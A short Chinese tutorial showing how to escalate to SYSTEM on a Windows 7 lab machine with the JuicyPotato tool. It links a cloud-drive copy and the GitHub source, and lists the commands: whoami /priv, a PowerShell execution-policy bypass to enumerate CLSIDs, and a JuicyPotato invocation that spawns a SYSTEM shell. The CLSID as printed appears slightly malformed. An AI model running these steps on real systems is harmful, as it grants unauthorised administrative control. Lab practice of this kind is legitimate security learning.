下面附带我使用的版本连接,百度网盘自取
链接:https://pan.baidu.com/s/1Ev-0THVltaSMDipFvBcrFg
提取码:heco
也可以官方下载https://github.com/ohpe/juicy-potato
具体原理我就不阐述了,其它博主都介绍得很详细。
1、将其放到我们需要提权的靶机中,这里我用的是windows7
2、在命令行窗口使用whoami /priv查看权限,如果全都禁用则无法提权
3、运行powershell -executionpolicy bypass -file clsid.ps1 >CLSID.list,具体根据自己的文件名称来
4、接着打开结果日志result.log文件,可以看到有部分的clisd是system权限,选择其中一个,在命令行中输入>JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1111 -c {000C101C-0000-0000-C000-0000000000461}
5、运行成功后会自动弹出命令行窗口,我们查看当前系统权限